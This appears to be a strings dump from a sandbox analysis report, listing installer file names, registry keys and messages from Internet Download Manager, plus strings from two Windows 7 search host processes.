/setlngid %d /fulllngfile %s
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Could not create/open registry key
Could not create/open registry key
%s%i="%s\
%s%i="%s\
IDM2.tmp
IDM2.tmp
Kernel32.DLL
Kernel32.DLL
VDMDBG.DLL
VDMDBG.DLL
PSAPI.DLL
PSAPI.DLL
IDMIntegrator64.exe
IDMIntegrator64.exe
idman.exe
idman.exe
{7D11E719-FF90-479C-B0D7-96EB43EE55D7}
{7D11E719-FF90-479C-B0D7-96EB43EE55D7}
https\
https\
http\
http\
IEGetVL2.htm
IEGetVL2.htm
IEGetVL.htm
IEGetVL.htm
IEGetAll.htm
IEGetAll.htm
IEExt.htm
IEExt.htm
https
https
%s%sGoogle\Chrome\User Data\Default\Extensions\jmolcgpienlcieaajfkkdamlngancncm
%s%sGoogle\Chrome\User Data\Default\Extensions\jmolcgpienlcieaajfkkdamlngancncm
SOFTWARE\Google\Chrome\Extensions
SOFTWARE\Google\Chrome\Extensions
Software\Mozilla\SeaMonkey\Extensions
Software\Mozilla\SeaMonkey\Extensions
mozilla_cc2@internetdownloadmanager.com
mozilla_cc2@internetdownloadmanager.com
mozilla_cc@internetdownloadmanager.com
mozilla_cc@internetdownloadmanager.com
Software\Mozilla\Firefox\Extensions
Software\Mozilla\Firefox\Extensions
%sGrabberData\
%sGrabberData\
%sDwnlData\
%sDwnlData\
%s\idmpla.ini
%s\idmpla.ini
%s\idmpldr.ini
%s\idmpldr.ini
GlobalErrors.log
GlobalErrors.log
UrlHistory.txt
UrlHistory.txt
dnlbtmn.txt
dnlbtmn.txt
%sidmmzcc7\
%sidmmzcc7\
%sidmmzcc5\
%sidmmzcc5\
%sidmmzcc03\
%sidmmzcc03\
%sidmmzcc3\
%sidmmzcc3\
%sidmmzcc02\
%sidmmzcc02\
%sidmmzcc01\
%sidmmzcc01\
%sidmmzcc2\
%sidmmzcc2\
%sidmmzcc\
%sidmmzcc\
scheduler.chm
scheduler.chm
defexclist.txt
defexclist.txt
%s\idmindex.dll
%s\idmindex.dll
%s\MediumILStart.exe
%s\MediumILStart.exe
%s\idmBroker.exe
%s\idmBroker.exe
%s\idmvconv.dll
%s\idmvconv.dll
%s\idmvs.dll
%s\idmvs.dll
%s\setup_error.log
%s\setup_error.log
%s\IDMGCExt.crx
%s\IDMGCExt.crx
%s\IDMNetMon64.dll
%s\IDMNetMon64.dll
%s\IDMNetMon.dll
%s\IDMNetMon.dll
%s\idmcchandler2_64.dll
%s\idmcchandler2_64.dll
%s\idmcchandler2.dll
%s\idmcchandler2.dll
%s\idmcchandler64.dll
%s\idmcchandler64.dll
%s\idmcchandler.dll
%s\idmcchandler.dll
%s\idmftype.dll
%s\idmftype.dll
%s\IDMFType64.dll
%s\IDMFType64.dll
%s\IDMFType.dat
%s\IDMFType.dat
%s\downlWithIDM64.dll
%s\downlWithIDM64.dll
%s\IDMGetAll64.dll
%s\IDMGetAll64.dll
%s\IDMIECC64.dll
%s\IDMIECC64.dll
%s\IDMIntegrator64.exe
%s\IDMIntegrator64.exe
%s\idmtdi64.sys
%s\idmtdi64.sys
%s\idmtdi32.sys
%s\idmtdi32.sys
%s\idmwfp64.sys
%s\idmwfp64.sys
%s\idmwfp32.sys
%s\idmwfp32.sys
%s\idmtdi.cat
%s\idmtdi.cat
%s\idmwfp.cat
%s\idmwfp.cat
%s\idmtdi.inf
%s\idmtdi.inf
%s\idmwfp.inf
%s\idmwfp.inf
%s\idmbrbtn64.dll
%s\idmbrbtn64.dll
%s\IDMShellExt64.dll
%s\IDMShellExt64.dll
%s\idmcchandler7_64.dll
%s\idmcchandler7_64.dll
%s\idmcchandler7.dll
%s\idmcchandler7.dll
%s\idmmzcc7_64.dll
%s\idmmzcc7_64.dll
%s\idmmzcc7.dll
%s\idmmzcc7.dll
%s\idmcchandler5_64.dll
%s\idmcchandler5_64.dll
%s\idmcchandler5.dll
%s\idmcchandler5.dll
%s\idmmzcc3_64.dll
%s\idmmzcc3_64.dll
%s\idmmzcc3.dll
%s\idmmzcc3.dll
%s\idmcchandler3_64.dll
%s\idmcchandler3_64.dll
%s\idmcchandler3.dll
%s\idmcchandler3.dll
%s\idmmzcc2_64.dll
%s\idmmzcc2_64.dll
%s\idmmzcc2.dll
%s\idmmzcc2.dll
%s\idmmzcc2.xpi
%s\idmmzcc2.xpi
idmbrbtn.dll
idmbrbtn.dll
NP_IDM.dll
NP_IDM.dll
idmmzcc.xpi
idmmzcc.xpi
grabber.chm
grabber.chm
IDMGrHlp.exe
IDMGrHlp.exe
downlWithIDM.dll
downlWithIDM.dll
idmupdt.exe
idmupdt.exe
INSTALL.LOG
INSTALL.LOG
DelPlug.exe
DelPlug.exe
UNWISE.EXE
UNWISE.EXE
UNWISE.INI
UNWISE.INI
Uninstall.exe
Uninstall.exe
IDMSetup.log
IDMSetup.log
tutor.hlp
tutor.hlp
tutor.chm
tutor.chm
tips.txt
tips.txt
etcprotocol.dll
etcprotocol.dll
nnprotocol.exe
nnprotocol.exe
nnprotocol.dll
nnprotocol.dll
idmmkb.dll
idmmkb.dll
IDMGetAll.dll
IDMGetAll.dll
IDManTypeInfo.tlb
IDManTypeInfo.tlb
idman.hlp
idman.hlp
idman.chm
idman.chm
IDMIECC.dll
IDMIECC.dll
license.txt
license.txt
Uninstall IDM.lnk
Uninstall IDM.lnk
Grabber Help.lnk
Grabber Help.lnk
TUTORIALS.lnk
TUTORIALS.lnk
license.lnk
license.lnk
IDM Help.lnk
IDM Help.lnk
%s%s%s%s
%s%s%s%s
SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\Internet Download Manager
SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\Internet Download Manager
%Program Files%\Internet Download Manager
%Program Files%\Internet Download Manager
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\IDM_Setup_Temp\setup_error.log
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\IDM_Setup_Temp\setup_error.log
It is neccessary to close all web browsers before running this Setup Program. Click Next to continue installation.
It is neccessary to close all web browsers before running this Setup Program. Click Next to continue installation.
Unauthorized reproduction or distribution of this program, or any portion of it, may result in severe civil and criminal penalties, and will by prosecuted to the maximum extent possible under law.
Unauthorized reproduction or distribution of this program, or any portion of it, may result in severe civil and criminal penalties, and will by prosecuted to the maximum extent possible under law.
If you want IDM to take over your downloads immediately after the installation, please close all web browsers before proceeding. You may open your browser after starting IDM.
If you want IDM to take over your downloads immediately after the installation, please close all web browsers before proceeding. You may open your browser after starting IDM.
The "Default" option will delete all executive files of IDM, and the integration of IDM into browsers.
The "Default" option will delete all executive files of IDM, and the integration of IDM into browsers.
Please visit hXXp://VVV.internetdownloadmanager.com
Please visit hXXp://VVV.internetdownloadmanager.com
6, 27, 1, 1
6, 27, 1, 1
SearchProtocolHost.exe_3196:
.text
.text
`.data
`.data
.rsrc
.rsrc
@.reloc
@.reloc
ADVAPI32.dll
ADVAPI32.dll
ntdll.DLL
ntdll.DLL
KERNEL32.dll
KERNEL32.dll
msvcrt.dll
msvcrt.dll
USER32.dll
USER32.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
TQUERY.DLL
TQUERY.DLL
MSSHooks.dll
MSSHooks.dll
IMM32.dll
IMM32.dll
SHLWAPI.dll
SHLWAPI.dll
SrchCollatorCatalogInfo
SrchCollatorCatalogInfo
SrchDSSLogin
SrchDSSLogin
SrchDSSPortManager
SrchDSSPortManager
SrchPHHttp
SrchPHHttp
SrchIndexerQuery
SrchIndexerQuery
SrchIndexerProperties
SrchIndexerProperties
SrchIndexerPlugin
SrchIndexerPlugin
SrchIndexerClient
SrchIndexerClient
SrchIndexerSchema
SrchIndexerSchema
Msidle.dll
Msidle.dll
Failed to get REGKEY_FLTRDMN_MS_TO_IDLE, using default
Failed to get REGKEY_FLTRDMN_MS_TO_IDLE, using default
pfps->psProperty.ulKind is LPWSTR but psProperty.lpwstr is NULL or empty
pfps->psProperty.ulKind is LPWSTR but psProperty.lpwstr is NULL or empty
d:\win7sp1_gdr\enduser\mssearch2\common\utils\crchash.cxx
d:\win7sp1_gdr\enduser\mssearch2\common\utils\crchash.cxx
d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrdmn\fltrdaemon.cxx
d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrdmn\fltrdaemon.cxx
d:\win7sp1_gdr\enduser\mssearch2\search\common\include\secutil.hxx
d:\win7sp1_gdr\enduser\mssearch2\search\common\include\secutil.hxx
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracerhelpers.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracerhelpers.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp
d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx
d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx
RegDeleteKeyW
RegDeleteKeyW
RegDeleteKeyExW
RegDeleteKeyExW
8%uiP
8%uiP
Invalid parameter passed to C runtime function.
Invalid parameter passed to C runtime function.
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp
-d-d-d-d-d-d-d-%d
-d-d-d-d-d-d-d-%d
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h
0xx=
0xx=
%s(%d)
%s(%d)
tid="0x%x"
tid="0x%x"
pid="0x%x"
pid="0x%x"
tagname="%s"
tagname="%s"
tagid="0x%x"
tagid="0x%x"
el="0x%x"
el="0x%x"
time="d/d/d d:d:d.d"
time="d/d/d d:d:d.d"
logname="%s"
logname="%s"
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx
SHELL32.dll
SHELL32.dll
PROPSYS.dll
PROPSYS.dll
ntdll.dll
ntdll.dll
RegCloseKey
RegCloseKey
RegCreateKeyExW
RegCreateKeyExW
RegOpenKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegQueryInfoKeyW
RegEnumKeyExW
RegEnumKeyExW
ReportEventW
ReportEventW
_amsg_exit
_amsg_exit
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
SearchProtocolHost.pdb
SearchProtocolHost.pdb
2 2(20282|2
2 2(20282|2
4%5S5
4%5S5
Software\Microsoft\Windows Search
Software\Microsoft\Windows Search
https
https
kernel32.dll
kernel32.dll
msTracer.dll
msTracer.dll
msfte.dll
msfte.dll
lX-X-X-XX-XXXXXX
lX-X-X-XX-XXXXXX
SOFTWARE\Microsoft\Windows Search
SOFTWARE\Microsoft\Windows Search
tquery.dll
tquery.dll
%s\%s
%s\%s
HKEY_CLASSES_ROOT
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
HKEY_CURRENT_CONFIG
Windows Search Service
Windows Search Service
0xx%p%S%d
0xx%p%S%d
advapi32.dll
advapi32.dll
WAPI-MS-Win-Core-LocalRegistry-L1-1-0.dll
WAPI-MS-Win-Core-LocalRegistry-L1-1-0.dll
winhttp.dll
winhttp.dll
Software\Microsoft\Windows Search\Tracing
Software\Microsoft\Windows Search\Tracing
Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported
Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported
Software\Microsoft\Windows Search\Tracing\EventThrottleState
Software\Microsoft\Windows Search\Tracing\EventThrottleState
%S(%d)
%S(%d)
tagname="%S"
tagname="%S"
logname="%S"
logname="%S"
Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}
Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}
.\%s.mui
.\%s.mui
.\%s\%s.mui
.\%s\%s.mui
%s\%s.mui
%s\%s.mui
%s\%s\%s.mui
%s\%s\%s.mui
Microsoft Windows Search Protocol Host
Microsoft Windows Search Protocol Host
7.00.7601.17610 (win7sp1_gdr.110503-1502)
7.00.7601.17610 (win7sp1_gdr.110503-1502)
SearchProtocolHost.exe
SearchProtocolHost.exe
Windows
Windows
7.00.7601.17610
7.00.7601.17610
SearchFilterHost.exe_3036:
.text
.text
`.data
`.data
.rsrc
.rsrc
@.reloc
@.reloc
ADVAPI32.dll
ADVAPI32.dll
ntdll.DLL
ntdll.DLL
KERNEL32.dll
KERNEL32.dll
msvcrt.dll
msvcrt.dll
USER32.dll
USER32.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
TQUERY.DLL
TQUERY.DLL
IMM32.dll
IMM32.dll
MSSHooks.dll
MSSHooks.dll
mscoree.dll
mscoree.dll
SHLWAPI.dll
SHLWAPI.dll
d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrhost\bufstm.cxx
d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrhost\bufstm.cxx
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp
RegDeleteKeyW
RegDeleteKeyW
RegDeleteKeyExW
RegDeleteKeyExW
8%uiP
8%uiP
d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx
d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx
Invalid parameter passed to C runtime function.
Invalid parameter passed to C runtime function.
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp
-d-d-d-d-d-d-d-%d
-d-d-d-d-d-d-d-%d
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx
RegCloseKey
RegCloseKey
RegCreateKeyExW
RegCreateKeyExW
RegOpenKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegQueryInfoKeyW
RegEnumKeyExW
RegEnumKeyExW
ReportEventW
ReportEventW
_amsg_exit
_amsg_exit
SearchFilterHost.pdb
SearchFilterHost.pdb
version="5.1.0.0"
version="5.1.0.0"
name="Microsoft.Windows.Search.MSSFH"
name="Microsoft.Windows.Search.MSSFH"
3 3(30383|3
3 3(30383|3
kernel32.dll
kernel32.dll
Software\Microsoft\Windows Search
Software\Microsoft\Windows Search
SOFTWARE\Microsoft\Windows Search
SOFTWARE\Microsoft\Windows Search
HKEY_CLASSES_ROOT
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
HKEY_CURRENT_CONFIG
Windows Search Service
Windows Search Service
tquery.dll
tquery.dll
advapi32.dll
advapi32.dll
API-MS-Win-Core-LocalRegistry-L1-1-0.dll
API-MS-Win-Core-LocalRegistry-L1-1-0.dll
0xx%p%S%d
0xx%p%S%d
Software\Microsoft\Windows Search\Tracing
Software\Microsoft\Windows Search\Tracing
Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported
Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported
Software\Microsoft\Windows Search\Tracing\EventThrottleState
Software\Microsoft\Windows Search\Tracing\EventThrottleState
0xx=
0xx=
%S(%d)
%S(%d)
tid="0x%x"
tid="0x%x"
pid="0x%x"
pid="0x%x"
tagname="%S"
tagname="%S"
tagid="0x%x"
tagid="0x%x"
el="0x%x"
el="0x%x"
time="d/d/d d:d:d.d"
time="d/d/d d:d:d.d"
logname="%S"
logname="%S"
Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}
Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}
.\%s.mui
.\%s.mui
.\%s\%s.mui
.\%s\%s.mui
%s\%s.mui
%s\%s.mui
%s\%s\%s.mui
%s\%s\%s.mui
%s\%s
%s\%s
winhttp.dll
winhttp.dll
Microsoft Windows Search Filter Host
Microsoft Windows Search Filter Host
7.00.7601.17610 (win7sp1_gdr.110503-1502)
7.00.7601.17610 (win7sp1_gdr.110503-1502)
SearchFilterHost.exe
SearchFilterHost.exe
Windows
Windows
7.00.7601.17610
7.00.7601.17610